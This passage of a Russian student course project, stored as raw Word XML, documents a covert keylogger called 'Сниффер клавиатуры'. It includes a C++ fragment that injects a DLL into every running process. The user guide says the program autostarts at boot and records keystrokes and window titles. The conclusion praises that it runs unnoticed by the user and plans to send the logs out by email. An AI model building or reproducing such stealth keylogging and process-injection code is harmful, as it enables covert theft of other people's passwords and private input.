    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>if (!Process32Next(hProcessSnap, &amp;pe32))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007352E5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8D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>if (Inject(pe32.th32ProcessID, dllPath))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>std::cout &lt;&lt; "Injection success:" &lt;&lt; pe32.szExeFile &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8C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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>} while (true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2314" w:rsidRDefault="00DC2314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8D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="00DC2314" w:rsidP="007352E5">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc420705268"/>
      <w:bookmarkStart w:id="29" w:name="_Toc420752654"/>
      <w:r w:rsidRPr="007352E5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Р</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidR="007352E5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>УКОВОДСТВО ПОЛЬЗОВАТЕЛЯ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00AC4812" w:rsidRDefault="00AC4812" w:rsidP="007352E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ановки приложения требуется запустить исполняемый файл программы. В результате программа установится на компьютер и при каждой загрузке компьютера будет запускаться автоматически.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F45AA" w:rsidRPr="007F45AA" w:rsidRDefault="00AC4812" w:rsidP="007352E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ссмотри работу с лог-файлами программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4812" w:rsidRDefault="00AC4812" w:rsidP="00AC4812">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="3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D66363" wp14:editId="5020ACD6">
            <wp:extent cx="5664200" cy="334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50"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5664200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812" w:rsidRDefault="007352E5" w:rsidP="007F45AA">
      <w:pPr>
        <w:spacing w:after="240"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7F45AA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.1 лог-файл</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F45AA" w:rsidRDefault="007F45AA" w:rsidP="007F45AA">
      <w:pPr>
        <w:spacing w:after="24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При изменении активного окна или заголовка активного окна</w:t>
      </w:r>
      <w:r w:rsidR="00C60C89">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в лог-файл записывается заголовок окна и идентификатор процесса.</w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В случае нажатии клавиши на клавиатуре, в лог файл записывается</w:t>
      </w:r>
      <w:r w:rsidR="00C60C89">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> время нажатия и </w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>соответствующий символ.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> При нажатии </w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>на системные</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> клавиш</w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00C60C89">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в лог файл записывается</w:t>
      </w:r>
      <w:r w:rsidR="003B3C11">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> время нажатия,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> соответствующее название клавиши в</w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> квадратных скобках.</w:t>
      </w:r>
      <w:r w:rsidR="001C1985">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Данные записи </w:t>
      </w:r>
      <w:r w:rsidR="00C60C89">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>позволяет собрать полную информацию о работе пользователя.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1FF6" w:rsidRDefault="005B1FF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FF6" w:rsidRPr="00546BF2" w:rsidRDefault="005B1FF6" w:rsidP="007352E5">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc420705269"/>
      <w:bookmarkStart w:id="31" w:name="_Toc420752655"/>
      <w:r w:rsidRPr="00546BF2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Т</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidR="00546BF2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ЕСТИРОВНИЕ ПРОГРАММЫ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="005B1FF6" w:rsidRDefault="005B1FF6" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing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</w:t>
      </w:r>
      <w:r w:rsidR="00601F1A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>был использован аналог разрабатываемого приложения -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> программа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Free</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1F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ey</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1F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</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1FF6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gger</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1F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3.9</w:t>
      </w:r>
      <w:r w:rsidR="00601F1A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001673FA" w:rsidRPr="00D405F0" w:rsidRDefault="001673FA" w:rsidP="007352E5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пустим приложение</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сниффер Кливиатуры</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Free</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gger</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.9”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D405F0" w:rsidRDefault="00D405F0" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing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В поле адреса браузер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405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fox</w:t>
      </w:r>
      <w:r w:rsidRPr="00D40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м тестовую строку </w:t>
      </w:r>
      <w:r w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007E450A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qwrt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1234567890” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и дважды нажмем системную клавишу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Left</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. После чего сравним результаты работы двух программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E450A" w:rsidRPr="007E450A" w:rsidRDefault="007E450A" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing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</w:t>
      </w:r>
      <w:r w:rsidRPr="007E450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ree</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405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ey</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405F0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gger</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405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D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.9</w:t>
      </w:r>
      <w:r w:rsidRPr="007E450A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E450A" w:rsidRPr="007E450A" w:rsidRDefault="007E450A" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing w:line="360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E075B65" wp14:editId="753DB398">
            <wp:extent cx="5619750" cy="32842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748" t="9695" r="6521" b="26141"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5633934" cy="329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87E" w:rsidRPr="008E387E" w:rsidRDefault="007E450A" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing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</w:t>
      </w:r>
      <w:r w:rsidRPr="008E387E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сниффер клавиатуры</w:t>
      </w:r>
      <w:r w:rsidRPr="008E387E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E387E" w:rsidRPr="008E387E" w:rsidRDefault="008E387E" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing w:line="360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1E88800" wp14:editId="2414026C">
            <wp:extent cx="4362450" cy="1838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073" t="38498" r="11491" b="6464"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="43624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50A" w:rsidRDefault="008E387E" w:rsidP="007352E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Анализируя результаты работы двух приложений, можно сделать вывод, что записанная информация об активности пользователя идентична.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00601F1A" w:rsidRPr="005B1FF6" w:rsidRDefault="008E387E" w:rsidP="00546B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грамма работает корректно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00586F70" w:rsidRPr="00546BF2" w:rsidRDefault="00E8372C" w:rsidP="00546BF2">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC4812">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="32" w:name="_Toc414805630"/>
      <w:bookmarkStart w:id="33" w:name="_Toc420705270"/>
      <w:bookmarkStart w:id="34" w:name="_Toc420752656"/>
      <w:r w:rsidRPr="00546BF2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>З</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidR="00546BF2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>АКЛЮЧЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRDefault="00FE0B31" w:rsidP="00546BF2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курсового проекта были спроектирована и разработана программ для отслеживания и записи активности пользователя </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0B31">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ниффер</w:t>
      </w:r>
      <w:r w:rsidR="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> клавиатуры</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0B31">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Приложение способно отслеживать нажатие клавиш и изменение текущего окна, также приложение способно работать незаметно для пользователя, не вызывая подозрений.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0B31" w:rsidRDefault="00FE0B31" w:rsidP="00546BF2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будущем планируется расширение функционала приложения, возможность отправки информации об активности пользователя на почту, сохранение информации в базе данных, для боле</w:t>
      </w:r>
      <w:r w:rsidR="005739EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е удобной работы, поиска, сортировки информации.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0B31" w:rsidRPr="002C67EB" w:rsidRDefault="00FE0B31" w:rsidP="00546B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зработки данного проекта, были получены обширные знания в разработке системного программного обеспечения для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="002C67EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0B31" w:rsidRPr="00FE0B31" w:rsidRDefault="00FE0B31" w:rsidP="00FE0B31">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="00F02139" w:rsidRDefault="00E8372C" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC4812">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="35" w:name="_Toc414805631"/>
      <w:bookmarkStart w:id="36" w:name="_Toc419842035"/>
      <w:bookmarkStart w:id="37" w:name="_Toc420705271"/>
      <w:bookmarkStart w:id="38" w:name="_Toc420752657"/>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Список литературы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="00AC4812" w:rsidRDefault="00E8372C" w:rsidP="00E8372C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F02139" w:rsidRPr="00F02139" w:rsidRDefault="00F534A9" w:rsidP="00F02139">
      <w:pPr>
        <w:pStyle w:val="ae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  <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Э. Таненбаум. Современные операционные системы, 3-е издание : Издательство: Питер, 2010. – 1116 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F534A9" w:rsidRDefault="00F534A9" w:rsidP="00F02139">
      <w:pPr>
        <w:pStyle w:val="ae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  <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Кейлогер— Википедия [Электронный ресурс]. – Электронные данные. –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00B4279B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/Кейлогер</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F534A9" w:rsidRDefault="00F534A9" w:rsidP="00F02139">
      <w:pPr>
        <w:pStyle w:val="ae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  <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Клавиатурные шпионы. Варианты реализации кейлоггеров в ОС Windows.</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Электронный ресурс</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. –</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Электронные данные. - </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00F02139" w:rsidRPr="00B4279B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
